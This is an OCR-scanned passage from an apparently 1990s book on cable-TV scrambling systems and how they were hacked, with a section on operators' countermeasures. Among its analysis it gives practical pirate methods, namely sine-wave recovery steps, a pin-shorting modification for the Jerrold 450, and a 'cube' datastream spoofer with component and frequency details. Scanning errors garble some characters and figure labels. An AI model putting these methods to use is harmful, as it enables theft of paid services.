this. Most people have neither the motivation nor the time to bother with 
trying to acquire a pirate descrambler. They are generally too busy trying to 
Survive. It is the people who have a lot of free time on their hands who are 
the most likely to opt for the premium services. 
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The threat of hacking is directly related to the type of scrambling in 
operation. If the cablenet uses blanket scrambling on all channels, then 
there is a stronger likelihood of a concentrated piracy effort. The logic of this 
is that each house will have the necessary starting point - the descrambler. 
The decoders will also be a lot easier to acquire. As a direct result, the 
piracy in this case will tend more in the direction of modifying the official 
descrambler. Blanket scrambling has as the negative effect, the creation a 
lot of potential pirates. 


In the case where only the premium channels are scrambled, the situation 
changes drastically and more so to the benefit of the cablenet. The demand 
for premium channels, especially on cable is not traditionally high. The 
option of receiving the same premium channels on satellite along with a lot 
more tends to convince people to get satellite television systems and 
subscribe that way. There is also the probability that the channels required 
are hacked on satellite. 


More by accident than design, the cablenets opting for selective scrambling 
reduce their vulnerability to hacking but at the same time, the low level 
piracy will still be a problem. The selectively scrambled cablenet can 
manage the distribution of decoders. This is a trade-off. There will always 
be low level piracy on a cablenet with selective scrambling. 


Low level piracy is where people can tap into the cable system illegally. This 
can be as simple as running a piece of coaxial cable along side the main 
cable feed. It is relatively easy for the cable company to detect illegal taps 
on their net using Time Domain Reflectometry. Other aspects can also be 
applied such as offering a bounty to informers to turn in people pirating the 
cable service. While in some countries this would work, it would have 
questionable value in Ireland. 


On the surface the threat may not seem significant when compared to 
satellite television piracy but when the figures are compared, a hack on a 
cablenet system is far more devastating. The reason for this is that most of 
the systems hacked are stone age relics and there is very little that can be 
done to stop the hacks technologically speaking. 


Of course legalistically speaking, it is like shooting fish in a barrel. The laws 
on cable television are there to protect the cable companies. They paid for 
them and in most cases, cable and MMDS companies have to pay a hefty 
licence fee to the government each year. 


So where does the threat to cable television systems come from? Logically, 
it is those with the knowledge and the access to the equipment that would 
pose the most risk. If there is a University or Technical College in the 
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Pisin Jsnr 


Addressing Systems 


Plain Jane 


V 7 Data And Synch Corriers 


Bond 1 Bond 2 Bond 3 Hyper Band 4/ 5 
Band 


Hyper Band (+) UHF or VHF 
on 
VHF Input Dutput 


Fixed Frequency 
Local Oscillator 


The Plain Jane system is rarely used as it offers 
extremely limited security. Many cablenets are 
permitted to operate channels in the Hyper Band 
but these channels if used will generally be 

test channels or scrambled channels. 
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cablenet area, then the students there will have a go. Of course some might 
say that the fact that the Black Book is in most college libraries and most 
educational institutes now have access to the internet has a lot to do with 
this. 


€ X Addressing 


There are basically two methods of descrambler addressing in use on cable 
systems; In Band Signal Addressing and Out Of Band Addressing. 


In Band signal addressing is the most complex and the most secure of the 
two systems. Address of the descrambler to be enabled is transmitted in the 
vertical blanking interval or on one of the non-video lines. The majority of 
addressable systems use the VBI for addressing and authorisation level and 
use the non-video lines for the descrambling algorithm. If the actual 
descrambling algorithm is stored in the descrambler then the variable data 
will be transmitted in the non-video lines. This method is often used with 
pseudo-random line inversion systems. 


Most of the current scrambling systems in use in Europe use in band 
addressing. The best examples of this type of addressing are the Discret, 
Cryptovision and Nagra Syster systems. 


The new FilmNet cable system, the imaginatively named CableCrypt, also 
uses in band addressing but this system is a synch replacement system 
based on the IRDETO LuxCrypt system. It uses digital audio so that simple 
video only hacks will not be sufficient. This system is compromised by what 
is effectively a blocker. It is based on a PIC microcontroller. It is not known 
how badly the hack is affecting the subscriber levels on services using this 
system. 


Out Of Band addressing is rarely used alone. With this system the 
addressing data and the authorisation data is transmitted on a carrier 
outside either the bandwidth of the signal or the band of channels. These 
carriers can easily be detected by a spectrum scan with a radio scanner 
with an oscilloscope hooked up to the output. 


The out of band addressing technique is a potential security risk. The 
hackers can detect these channels and eventually use them against the 
descrambler. The cube, described later in this chapter is a prime example of 
this. In band addressing means that the hacks would be more likely to be 
hardware modifications to the official descramblers. 
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Ф Primitive Systems 


Watching the evolution of cable scrambling systems is like watching a rock 
grow. Of course from time to time there is some volcanic eruption that 
creates a new layer but the vast majority of the terrain remains. 


The more primitive systems are based on signal denial, signal interference 
and signal translation. These systems are now fading out of use primarily 
because they offer little security. However it is not unusual to find such 
systems in use on small cablenets. 


Notch Filters 


One of the simplest methods of denying service is to place a notch filter on 
the subscriber's line. The notch filter will be tuned so as to take out a 
particular channel. The down side of this for the cable company is that a 
control box is required for every few houses passed. If the control box is 
properly secured then there is little that can be done to restore the channels 
apart from tapping into another subscriber's line. 


Any interference with either the main signal carrying cable or the cable of 
another subscriber will easily be detected. In many case, all that is required 
is a quick visual inspection of the cables entering a house. 


This kind of system, while not being a true scrambling system, is a very 
effective one. It is very low tech and correspondingly very cheap. 


The hacker solution for this type of system is to set up a cable transformer 
to pick up the signal leakage from a signal carrying cable. The principle is 
very simple though in practice, the results vary. 


The cable transformer is simply a piece of coaxial cable placed along side a 
signal carrying cable. One end of the coaxial cable is then connected to a 
wideband amplifier. In most housing estates, the main signal cable is fed 
along the sides of the houses. This makes it extremely easy to conceal the 
“pirate” coaxial cable. 


The problem with the hack is that it is widely known about. Therefore the 
cablenets generally take measures to protect the main signal carrying cable 
by encasing it in a metal pipe. As a result the hack has to be used on the 
subscriber drop cables. 


Another hack depended on the depth of the notch. A tuned amplifier with 
enough gain was merely inserted in the line. It worked with the earlier LC 
notch filters. The advent of more secure or deeper notch filters defeated this 
hack. 
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Plain Jane 


The “Plain Jane” system, like the notch filter, is not really a scrambling 
system. It is merely frequency shifting. The television channels were 
frequency shifted to a block outside the bandwidth of the normal television 
tuner. 


Some of the Plain Jane systems used the frequency block in between VHF 
Band 3 and UHF Band 4. This accidentally defeated by television and VCR 
manufacturers. They used tuners that could cover these frequencies and 
advertised their sets as being “cable ready”. 


In the early eighties, there were a number of companies trying to sell VHF 
based systems in the UK. The majority of UK televisions only had UHF 
tuners and therefore would not have been able to pick up VHF. The 
situation today is different. Most of the televisions and VCRs sold are sold 
as being cable ready. 


The Plain Jane system is not widely used at present and only an idiot of a 
system manager would choose such a system. With the advent of more 
television channels, some cablenets in Ireland are licensed to use the 
frequency block between Band III and Band ІМ. To date the main use for 
these channels has been for the premium channels such as Sky Movies 
and Sky Sports but once tests were completed, scrambling was introduced 
on these channels. 


On cablenets where there is partial scrambling, the frequency block 
between Band II and IV is used for testing of new channels. There is very 
little use of this form of signal protection in Europe. 


Interfering Carrier 


The Interfering Carrier is a low security system that is more suited to cable 
television applications than to satellite television. It is also a technique that 
can reduce the overall quality of the received signal. The interfering carrier 
can be applied the signal frequency, the IF or at baseband. It is generally 
situated in an area of low video activity. The level of the interfering carrier is 
determines the effectiveness. When the level of the interfering carrier is 
close to that of white level, severe interference will result. All thai is required 
to remove the carrier is a very high Q filter tuned to the frequency of the 
carrier. 


There are two methods that are used to improve the security of the system; 
multiple carriers and varying frequency carrier. From a hacker's point of 
view, the multiple carrier version is the easier of the two to defeat. The 
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frequency of each carrier would be static and therefore a filter could be 
tweaked for the best result. 


The official descrambler would use a switched surface acoustic wave filter, 
(SAWF), to notch out the interfering carriers. The notching or switching 
sequence would be controlled either by addressing or by a programmable 
read only memory IC, (PROM), in the official descrambler. The filtering in 
the hacker descrambler would be carried out using standard LC circuits. 
The quality may not be as good as the official descrambler but it does 
produce a watchable picture. 


The variable frequency carrier is more secure and will deter the most 
hackers but is not secure against a dedicated hacker, or indeed pirate. In 
this system a carrier of constantly varying frequency is injected into the 
baseband. The multiples of the line frequency are the commonest centre 
frequencies for these carriers. The commonest technique used to hack this 
System is the tracking filter. Such a descrambler is difficult to construct as it 
requires a lot of adjustments before it will operate properly. 


The average hacker will not generally have the expertise, the test 
equipment or the time necessary to develop a descrambler. This is not so 
much a reflection on the average hacker's skill as the nature of the hack. 
This is an RF based hack that requires RF design expertise. Since many of 
the hackers in Europe are more used to coping with baseband video and 
audio than RF. 


Unfortunately for the cable system owners life is not so simple. A hack on 
such a system will eventually spread so that it becomes a major problem. 


In recent years, this form of scrambling has been dropping out of usage. It is 
being replaced by more complex systems though again, the glacial pace of 
the cable television industry means that this form of scrambling may be in 
use on some smaller cablenets for a few years to come. 


It is a cheap option that can lure a cash strapped cable company. However, 
sooner or later the company will have to upgrade to a more secure system. 
e Synch Suppression And Attenuation 


The main target for these forms of scrambling is the synch pulse section of 
the video line. When the synch pulse section of the line is interfered with, 
the television will not be able to lock up the picture. Often in this form of 
scrambling, the frame pulse section is left unscrambled. 


The terms suppression and attenuation are often used interchangeably in 
cable television security. Attenuation is where the magnitude of the synch 
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Interfering Carrier Scrambling 


Interfering Carrier 





ssf 


Colour 


Subcarrier Audio 


Sukcarrier 


Video Signal 


Interfering carrier scrambling applied at baseband level, 
The carrier is placed between the video and audio signals 
in the baseband spectrum. A simple notch filter can 
remove it. 





Colour 
i Audio 
Subcarrier subcarrier 


Video Signal 


In this variation, the interfering carrier is placed in 
the video signal. This makes it harder to remove. It 
is essentially the RF method. The interfering carrier 
is added and removed when the signal is at the IF 
stage rather than at baseband. Surface Acoustic 
Wave Filters are used for this process. The SAWFs 
can be fabricated with a very narrow stop band, 
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pulses is reduced and suppression is where the level of the synch pulses 
are changed relative to the active video. To anyone used to working with 
baseband systems, this difference is clear. The synch pulses, in a 
baseband attenuated synch system, will be smaller than those in a normal 
video line but they will not necessarily be shifted up into the active video 
region of the line. 


However with an RF based system, the scrambling is applied by varying the 
gain of an RF amplifier. Since the amplitude of the signal changes, this 
means that the position of the synch pulses with respect to the active video 
changes. Of course when the signal is demodulated into baseband, the 
synch pulse is both attenuated and level shifted upwards into the active 
video region. The result of all this is that in cable television scrambling, 
these techniques are described as suppression. 


The trend on cable based scrambling systems for the last fifteen years or so 
has been decidedly low tech and RF based. This is because the 
suppression techniques are easy to apply and remove from an RF signal. 
The method for applying and removing the techniques from the signal is 
simply amplitude modulation with a variable gain amplifier. 


If the scrambling system applied an attentuating signal, then the descram- 
bler has to apply a reciprocal amplifying signal. Thus the official decoders 
do not actually have to demodulate the signal as such. This remarkable fact 
simplifies the descrambler considerably. It also means that any system 
using this technique is totally compromised of the modulating waveform can 
be replicated. 


The commonest implementations of synch suppression scrambling sys- 
tems on cable are sine wave synch suppression and pulse synch 
suppression. 


It should be stated that synch suppression scrambling is not permitted in 
some European countries. Synch suppression is an antiquated form of 
scrambling that can easily be overcome. A cable company that chooses this 
type of scrambling would be taking a severe risk. It has to choose between 
a cheap and reliable scrambling system that will have piracy and will quickly 
repay the investment or a more expensive system that will have a reduced 
risk of piracy but will take longer to pay back the investment. 
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e Sine Wave Synch Suppression 


Sine wave synch suppression is ideally suited to cable television scram- 
bling. It can either be applied to the signal at baseband or to the transmitter 
amplifier. The transmission mode for terrestrial television is amplitude 
modulation. (For the purists - Vestigial Sideband.) 


The commonest method of applying the sine wave to the signal is via a 
variable gain amplifier at the IF stage. The scrambled signal is then 
translated to the transmission frequency. 


This sine wave cannot be removed from the demodulated signal by a clamp 
in the way that the dispersal waveform is removed from the video of a 
satellite broadcast. 


The frequency of the sine wave can either be line frequency or a multiple of 
the line frequency. The wave is phased so that in baseband it has the 
appearance of pushing the line synch pulse up in to the video region of the 
signal. (Note: Positive going video and negative going synch waveform used 
for example.) Again it should be remembered that this is an RF system and 
it is descrambled using RF techniques. Considering it in terms of hacking 
the signal at baseband is misleading. 


With some systems, the sine wave is switched off during the vertical 
blanking interval. This causes the frame to lock on the television but there is 
no line lock. To complicate matters further, the video can be inverted and or 
reduced in amplitude. The reduced amplitude option is rarely used due to 
the complications that it can cause. 


There a number of ways to descramble such a signal. All of them rely on 
detecting the sine wave and using it to control the gain of a variable gain 
amplifier. 


The official decoders generally use a sine wave transmitted on either the 
audio subcarrier or a separate subcarrier. The actual sine wave is amplitude 
modulated on to the FM carrier. The level of the sine wave on the audio 
subcarrier is very low so it is affected by any limiting circuit in the television 
receiver. The separate subcarrier can be near to the channel or it can be in 
a totally different band. It is the more secure of the two. 


The procedure used for hacking such a system is relatively straightforward. 
Of course much of the following can be eliminated by simply finding the type 
of system in operation. This would allow a hacker to streamline the 
approach. 
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1. Establishing The Sine Wave Frequency 


The first step is to identify the kind of system in use. This means 
establishing the approximate frequency of the sine wave. The simplest 
method of doing this is to examine the RF signal at the IF frequency, if the 
oscilloscope is fast enough, or at baseband if the oscilloscope is not that 
fast. 


Most systems employ a line frequency sine wave, though some will use a 
sine wave at twice or three times the line frequency. This means that it is not 
exactly a difficult task. 


2. Finding The Sine Wave 


Because sine wave synch suppression scrambling is such an old technique, 
it is often best to use exactly the same method that the official descrambler 
uses to decode the signal. Of course in order to do this, it is necessary to 
find the sine wave that the official descrambler uses to descramble the 
signal. 


There are generally two areas for the sine wave to be found; amplitude 
modulated on to the FM audio subcarrier or as on a separate RF carrier. 


The raw FM audio subcarrier is then fed to the oscilloscope. This test will 
determine if the system uses a separate subcarrier for the decoding signal. 
This audio subcarrier must not be FM limited as the descrambling waveform 
is often amplitude modulated on to the FM subcarrier. 


If the sine wave was not present on the FM audio subcarrier, the it is 
necessary to scan the cablenet's spectrum for the RF carrier. This is not as 
complex as it seems. Basically, an RF scanner is connected to the cable 
outlet. The audio output from the scanner is then connected to an 
oscilloscope. By stepping through the frequencies, it will be possible to 
detect the carrier used. 


3. Regenerating The Sine Wave 


If the sine wave cannot be detected by the above techniques, it is possible 
that the system regenerates the sine wave in the descrambler. This is not, 
as it might seem, that complex. 


The interfering sine wave has to be stripped and antiphased for cancella- 
tion. The frequency of the interfering sine wave will commonly be higher 
than that of the line frequency. The official descrambler would not use 
filtering to remove a line frequency sine wave though there are probably 
exceptions. An official descrambler would use a phase locked loop to 
descramble the signal. This method is a very costly and very effective 
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method of descrambling. A typical hacker design would use a high Q filter, a 
phasing network and a variable gain RF amplifier for cancellation. 


If the sine wave is present on the FM audio subcarrier it must be stripped off 
with an AM demodulator. Alternatively, if the sine wave is present on a 
separate subcarrier it must be demodulated and filtered. The separate 
subcarrier could be very close to the channel and so it may be present if the 
IF output of a tuner tuned to the scrambled channel. 


On most cablenets, the channels are genlocked. This means that the 
synchs on all channels are in phase. The reason for this is largely for the 
reduction of interference but in this case it has an added advantage: only 
one reference sine wave is needed. 


4. Decoding The Signal 


One of two methods is used to descramble the video signal; baseband 
antiphasing or RF antiphasing. RF antiphasing involves feeding an an- 
tiphased sine wave to a variable gain amplifier. This produces the best 
results on the descrambled picture. 


Antiphasing at baseband does not produce the best quality. It can cause 
tearing on peak whites and on saturated colours. Of course it also requires 
the signal to be demodulated and processed. 


Pirate Sine Wave Descramblers 


The difference between a pirate Sine Wave Synch Suppression descram- 
bler and an official one is simple. The pirate device does not have any 
access control circuitry. Why reinvent the wheel? 


The descrambling in this design takes place at the Intermediate Frequency. 
This allows the overall design of the decoder to be drastically simplified. It 
becomes effectively two distinct sections with minimal data being ex- 
changed between the two modules. This of course has the added 
advantage of allowing the circuitry of each section to be hardened against 
hacking. 


One of the better examples of this can be seen in the official Jerrold 
Starcom descramblers where the RF descrambling section is blobbed in a 
ceramic like package. The term for this type of circuit is a thick film circuit. It 
allows the design to be repeated with minimal tuning as the components are 
a combination of surface mount devices and resonant copper tracks. 


The front end of the descrambler is effectively an RF tuner. The channel to 
be descrambled is selected by the tuning voltage on the tuning pin. This 
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tuner translates the selected channel to the IF frequency. In the US pirate 
designs of the mid eighties, the tuner output was modified so that the IF 
output was in the region of US Channel 3 (61.25 MHz). 


The fact that the channel was converted down to 61.25 MHz meant that 
ordinary television receiver IF circuitry could be used as the channel 
frequency is near to the typical television IF frequency. 


One of the more primitive designs for a sine wave descrambler (covered in 
the Pink And Brown Book) was based on an IF amplifier, a video 
demodulator and a sine wave demodulator/filter. It took the demodulated 
video signal from the MC1330 demodulator and fed it directly into a 15 KHz 
Op-Amp based amplifier / filter circuit. This relied on the fact that the filter 
would only pick out the relatively frequency low 15 KHz sine wave from the 
composite video signal thereby acting as an AM demodulator. This Op-Amp 
stage was then followed by an amplifier stage and Op-Amp filter. 


The output from the Op-Amp filter was used to control the gain of the first 
stage IF amplifier. The output of the second IF amplifier was fed to an 
impedance matching transformer. 


The design in the Cable And Satellite Descrambling book by Sheets and 
Graff (Sams 1986, ISBN 0-672-22499-2) used a similar approach but used 
a single stage Op-Amp filter and used a PIN diode circuit to effect the RF 
gain control. 


In both of these designs, the essential element was that the signal had been 
downconverted to roughly 61.25 MHz (US Channel 3). This ordinarily would 
require a tuner front end. It is this that tends to make the hardware 
modifications to the official descramblers a more attractive option. 


e Pulse Synch Suppression 


The pulse synch suppression technique is perhaps easier than to hack that 
the sine wave synch suppression. The pulse synch suppression technique 
is only applied to the synch section of the line whereas the sine wave 
method has an effect on the whole line. 


Commonly, the suppression is not applied to the vertical synch. This is why 
the television receiver will be able to achieve vertical lock while not 
achieving horizontal lock. Of course with the increasing sophistication of 
television design, manufacturers of pulse synch suppression were faced 
with the situation that some of the synch circuitry used in television receiver 
designs could lock up the horizontal from by using the frame synch. This 
forced the systems manufacturers to introduce refinements such as 
tri-mode. 
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The descrambler for pulse synch suppression is again largely similar to that 
used for the sine wave suppression. Except in this case, the suppression is 
pulse based. Therefore a synchronising pulse stream is transmitted 
somewhere in the signal. 


The commonest place for the synchronising pulse stream was the FM audio 
subcarrier. It would be amplitude modulated on to this FM carrier. The 
alternative to the AM on FM synch signal was to include an ultrasonic (31.25 
KHz or 62.5 KHz) pulse stream with the audio. 


In the descrambler, this pulse stream would be demodulated, rephased and 
used to control a variable gain RF amplifier. The whole descrambling 
procedure could be carried out at RF as opposed to baseband thereby 
lowering the cost of the descrambler. 


On some of the older designs, a separate FM synch carrier was used. This 
would be transmitted separately, often away from commonly used television 
channels. Again the emphasis was on low descrambler cost. It also made 
things a lot easier for the hackers in that it was simply a case of detecting 
this carrier with a scanner and then designing a simple RF receiver to 
recover the pulse stream and rephase it with for use with a variable gain 
amplifier. 


This type of out of band synch carrier made the overall design of pirate 
descramblers easier. As a result most of the cablenets using this kind of 
scrambling system eventually opted for more the more secure forms of 
synch suppression scrambling. The more secure form involved variable 
levels of synch suppression. 


Pirate Pulse Suppressed Synch Descramblers 


The out of band pulse synch suppressed systems were the easiest to hack 
in that they only required the detection of the synch carrier signal. Again the 
same approach of the IF amplifier and video demodulator is used. The 
output of the video demodulator is essentially a synch carrier that is used to 
control a PIN diode circuit. 


The in-band form of pulse suppressed synch system is slightly harder to 
hack. The synch carrier is amplitude modulated on to the FM audio 
subcarrier. As a result, this approach requires the AM signal to be detected. 
This is achieved by using a video demodulator tuned to the FM audio 
subcarrier frequency. 


Once this synch signal is recovered, it is generally fed to a rephasing circuit. 
The rephasing circuit is typically based on 4528 / 4098 monostables as 
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detailed in chapter 3. Sometimes a 4046 PLL is included to provide more 
stability. 


The reconditioned synch signal is used to control the gain of an IF amplifier 
or a PIN diode circuit like the previous descrambler designs. Of course this 
type of approach is limited to one level of synch suppression only. Tri-Mode 
synch suppression went some way towards stopping this simplistic hack. 


Tri-Mode 


The Tri-Mode system was developed by and patented by Jerrold. Other 
manufacturers, such as Scientific Atlanta use this system's scrambling and 
access control system under licence. This has given rise to the term “multi 
vendor compatibility”. This means that a Jerrold descrambler can be used, 
with the proper authorisation codes on a cablenet that employs the Scientific 
Atlanta Tri-Mode system. 


The tri-mode pulse suppression method of scrambling is one of the 
standard methods used in the US and Europe. It is often billed as being 
highly secure. The reality is that the method is far from secure and articles 
on how to hack it have been widely published in the US. Radio Electronics 
published a complete design along with printed circuit board layout for this 
system in the February 1987 issue. Luckily for the system owners in 
Europe, very few cable hackers have read the American article. 


Hacking the Jerrold Tri-Mode system in this fashion is difficult and time 
consuming. Given the breath of the modifications for the official descram- 
blers, attacks on the scrambling system itself are becoming rare. 


The system relies on attenuating the horizontal blanking section of the line 
by OdB, бав ог 10dB. This is achieved by a variable gain amplifier operating 
at RF. By using this method of applying the suppression, it simplifies the 
descrambler design in that the signal does not have to be demodulated. In 
the OdB mode there is no attenuation and the picture is effectively clear. 


The synch signal is amplitude modulated on to the FM audio carrier. In 
addition to the synch information, the carrier includes data that indicates the 
attenuation mode in use. The information here has been synthesised from a 
number of American sources. Before the manufacturers of this system start 
whinging that | am divulging top secret information, | should say that the 
main source of information was the article in Radio Electronics. Therefore 
this information is from openly published sources. 


In the NTSC system, the first 20 lines or so of each field are unused. The 
tri-mode system uses these lines positions to carry data. The data is carried 
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on the synch carrier rather than the data. The data is a 17 bit packet. Each 
bit of the packet is inserted in the video space in the synch train. In the 
NTSC system, the data bit starts 20 uS after the rising edge of the synch 
pulse. Bits 0 to 8 carry the programme authorisation data. Bits 8 to 15 carry 
the descrambler enable codes. The bits 12 to 15 carry the scrambling 
codes. The OdB code is 0010. The 6dB code is 1000. Тһе 10dB code is 
0100. The states of these four bits are continually changing. This is a 
security measure that has been reasonably successful. 


The key to the system is the detection of the state when all bits 12 to 15 are 
logic 1. This is the identifier. The state prior to this state is the scrambling 
mode in use. This hack requires sequential and combinational logic to 
execute. 


The descrambler for this system is RF rather than baseband orientated. 
When a signal is demodulated it is clamped. Since the television receiver 
uses the blanking levels for clamping it is obvious that the result will be an 
unmitigated mess. The approach used in the official and the hacker 
descramblers is to demodulate the data and the synch carrier and use 
gated RF amplifiers to descramble the RF. The descrambled data would 
then be fed to the television receiver. 


The system is an antique and is not very popular in Europe as it is not 
transparent in the way Cryptovision and VideoCrypt are. Both of these 
systems can be accessed via the SCART connector on the television. The 
main factor that appears to have limited the piracy on the system when it 
was used in Europe is the cost of the RF section involved. 


To actually descramble the signal, a cable tuner with an standard TV IF 
output has to be constructed. Using a standard wideband tuner this would 
cost about £30.00. The descrambler section must then be constructed for a 
cost of about £30.00. The total cost for the hacker descrambler would 
approach one hundred pounds or so. 


One rumour from a cablenet where a tri-mode scrambling system was used 
reflected a serious lack of security on the part of the system owner. The 
reason why there was no piracy was that there were no pirate descramblers 
only modified official ones. When subscriptions had expired, the cable 
company had not repossessed the descramblers. Someone had figured out 
how to hot wire the descramblers. 


It is not known if the compromised cablenet actually emp d апу 
consultants to ascertain the most logical choice of systems. Th- system 
was probably chosen because of its subscriber management capability. 
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Other Hacks On Tri-Mode 


Building a pirate descrambler for a cable system is hard work. It is 
especially futile when there are so many potential pirate descramblers 
available. In a cablenet where there is blanket scrambling, each and every 
Official descrambler is a potential pirate device. This of course is a rather 
piratical viewpoint. 


With this in mind, many of the US cable system hackers of the mid and late 
eighties drifted away from the idea of manufacturing pirate descramblers. 
To get into manufacturing cable descramblers would be similar to reinvent- 
ing the wheel. Of course there was always the problem of distribution. 


This move away from pirate descramblers towards the modification of 
official descramblers quickly produced results. The designs of the official 
descramblers left a lot to be desired in terms of security. It seems as if the 
designers were more intent on making the scrambling technique too difficult 
to hack. As a result, they made some very stupid mistakes in the security 
architecture of the official decoders. The first hacks directed at the official 
descramblers were as simple as shorting some pins and cutting PCB 
tracks. 


The main reason for the simplicity of these hacks was the simplicity of the 
descrambler's security architecture. Well, the term "security architecture" 
might be stretching things a bit too far. The architecture was far from 
secure. 


Citizens Band Radio was an interesting diversion for the technically minded 
in the early eighties. The CB radios always had to follow the FCC channel 
specification. Most of the units that ended up in Europe were modified as a 
matter of course. After a while, a whole industry devoted to modifying these 
radios to either operate on more channels or produce more power sprung 
up. The initial hacks were based on shorting out various pins and cutting 
tracks. The PLL frequency synthesisers were not that complex. Some of 
them were capable of being modified by additional EPROMs and logic 
gates. The connection with cable scrambling is that the same techniques 
used to modify CB radios were applied to the cable scrambling systems with 
similar good results. 


Much of the information on the hacking of Tri-Mode seems to be American 
in origin. This is logical considering that it is primarily an American system 
though it is popular on some of the smaller cablenets here in Europe. The 
majority of these nets use more recent systems such as Cryptovision, 
Syster and Discret. 
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However the fact that there is a considerable amount of American hacker 
literature and devices available for the Jerrold Tri-Mode indicates that the 
system is not secure. However it remains to be seen if these techniques will 
readily translate the the European implementations of the system. Consid- 
ering that the main difference between the European implementations and 
the American implementation is the television standard, (PAL vs NTSC), 
there is a probability that the main security architectures of the Jerrold 
Tri-Mode descramblers are identical to their American variants. 


On the Tri-Mode Jerrold 450 series, the full service modification was as 
simple as shorting pin 2 to 3 and pin 13 to 15 on the digital descrambler 
board. However modifications based on the principle of shorting out 
connections were quickly discovered and more secure versions of the 
descramblers were implemented. Apart from the star type screws that 
require a custom screwdriver, or a small cutters, elements such as 
anti-tamper switches were incorporated into the design. 


As the level of the descrambler security increased, the hackers’ knowledge 
followed. Since the simple jumper modifications were no longer an option, 
the hackers went after the access control data. This was the advent of the 
test chips. 


The Jerrold Starcom 6 test chip was an EPROM based hack. It involved 
replacing the official EPROM, which was in a DIL socket on some models. 
This alternative EPROM was referred to as a Test Chip as it opened all 
channel on a descrambler. 


The test chip for the Jerrold Starcom 7 was based on a programmable logic 
array, a GAL22V10. It took the form of a small PCB carrying the PLA that 
was soldered over the descramblers EPROM and connected to the 
descrambler's RAM. Other more innovative versions involved the use of a 
test clip. 


The problem with the hacks described above is that they all require 
hardware modifications to the actual circuitry of the descrambler. This 
means that they can only be carried out by someone with technical 
knowledge and as such are not widely marketable. This the point where the 
situation changes from pure hacking to piracy. In order for a pirate device to 
become marketable, it has to be usable by people without any real technical 
knowledge. To use an expression from the computing business, it has to be 
"Plug and Play". 
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Cubes 


They were black, they were potted in epoxy resin and they were shaped like 
cubes. The name stuck. These devices were the forerunners of the Phoenix 
programs used on the smart card systems. Basically put, the cubes blocked 
the official access control datastream and flooded the descrambler with a 
fake datastream that authorised it for all channels and services. They 
beauty of this hack was that it was a soft hack. Remove the cube and the 
descrambler would soon return to its previous status. Above all it did not 
require any hardware modifications to the descrambler's circuitry. 


The American variants of the Jerrold system generally transmits its access 
control datastream at 97.6, 106.5 and 108.5 MHz. One European variant 
transmits the datastream at 122.75 MHz. The first part of the cube is a 
notch filter to remove this datastream. Some models of the cube actually 
use a high enough level of RF to flood the descrambler so that the notch 
filter is not necessary. It is not a particularly elegant solution but then the 
main thing is that it worked. 


The access control datastream transmitted at approximately 14KHz the 
data using Manchester encoding. The modulation method is frequency shift 
keying (FSK). 


As can be seen from the number of datastream frequencies in use, cubes 
had, initially, to be tailored for the particular cablenet. This somewhat limited 
their usability. The first designs were based on single crystal designs. More 
advanced models used a synthesizer. The Group 42 solution was to use a 
crystal based modulator with enough harmonics to hit all of the Jerrold 
frequencies. The main encoding and data generation is taken care of by a 
PIC16C54 running at 8 MHz. The output of the PIC16C54 is then used to 
pull the frequency of a crystal oscillator, (8 MHz for Jerrold, 11 MHz for 
Pioneer descramblers),using a varicap circuit. The oscillator is divided down 
to 500 KHz by a 74HC4060. The resultant 500 KHz signal is then fed to the 
descrambler via an F-Connector. The voltage at the output is approximately 
5 Volts. This square wave signal produces harmonics that are high enough 
in level to over-ride the official datastream. 


To date, cubes have been rare in Europe as most of the hacking seems to 
be aimed at satellite based transmissions rather than cable. However there 
were rumours of test chips, cubes and hardware modifications on the Cork 
cablenet in Ireland. 
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The Group 42 Cube design uses a PIC16C54 to generate a datastream with the relevant turn-on 
instruction for the decoder ID. This datastream is fed to an FSK modulator comprised of the 
varicap and the crystal circuit. The 74HC4060 then divides the FSK datastream down to around 
500 KHz. The theory is that the harmonics will occur on the datastream frequencies of the 
decoders. For Jerrold'decoders, ап 8 MHz crystal is used and for the Pioneer decoders, an 11 
MHz crystal is used. European operation requires different frequency crystals. 


This design is not the most technologically elegant in that it floods the decoder with RF. More 
advanced designs incorporated a filter arrangement that would notch out the official 
datastream carrier and then would allow the Cube's datastream to replace it. 


This is a transparent hack. If it is removed then the decoder will revert to its initial state as it 
will not receive the necessary heartbeat signal from the headend. 
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ө Cablenet Countermeasures 


The cablenets are not as simple a target as satellite channels. Indeed there 
is often very strong anti-piracy legislation that covers cable hacking in 
Europe. This of course does not mean that they will limit their actions to 
legal proceedings against the hackers and pirates that they catch. They will 
often implement countermeasures on their own cablenets. 


The obvious method of detecting an illegal connection on a cablenet is to 
look for the unauthorised connection. This can be as simple as looking for a 
cable on the front of a house that should not be there. 


A more subtle, and perhaps more effective, method is to use time domain 
reflectometry. This is where a pulse of a known level and duration is sent 
down a cable. The echo should have known characteristics relating to the 
length of the path and the impedance. When an unauthorised connection is 
made, the shape and level and timing of the echo is different to that 
expected. This form of piracy detection seems to be commoner in the US 
than in Europe. 


Cable company executives tend to speak in glowing terms of Bullets. These 
bullets are sent down the cable with the aim of killing the pirate 
descramblers. It is all part of the macho mumbo-jumbo so beloved of those 
who sit behind a desk all day shuffling papers. The truth, somewhat like the 
cable executives, is more mundane. 


A bullet is a kill signal received and acted upon only by the pirate 
descramblers on the cablenet. The legitimately authorised descramblers do 
not receive the kill signal. 


In order to implement a bullet, the cablenet must shut down all the legitimate 
descramblers on the net. It then sends a kill signal to all of the descramblers 
still in operation. The logic being that the descramblers still in operation will 
be pirate devices. Then they just wait. 


Soon the phone calls will start coming in. These will mainly come from 
people complaining of loss of service. The majority of these people will have 
been using a descrambler that has been hit by the bullet. Commonly it will 
be the people in the household who are not clued up on the fact that the 
descrambler is a pirate device. Depending on the complexity of the bullet, 
some pirate descramblers will have to be reactivated by the hacker who 
carried out the original modification. 


The word “free” is the one thing that most people respond to. Knowing this 
elementary piece of psychology allows the cablenet to implement some 
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nasty ECMs. While these ECMs are not totally electronic, they are very 
effective though they can misfire. 


The commonest form of the this ECM is the “Free Tee Shirt” sting. During 
some event that the cablenet knows will have a very high audience level, the 
cablenet will switch the officially authorised descramblers to another 
channel. The user will be oblivious to this little switch. It will generally 
happen during the adverts break. 


Since the pirate devices are ignoring the official datastream, they will 
continue on the same channel. An advert by some company promising a 
free tee-shirt for the first N hundred callers will be screened. It will only be 
seen on the pirate descramblers and in all probability it will be attractive to 
children. When the advert is over, the cable headend will instruct the official 
descramblers to switch back to the original channel. Again the only thing 
that the cablenet has to do is to wait for the pirate descrambler users to call 
in for their free tee-shirt. 


Of course such stings do not always run smoothly. In one such sting in 
Ireland a few years ago, the advert was seen and details were spread by 
word of mouth. The cablenet got more people calling in for their free 
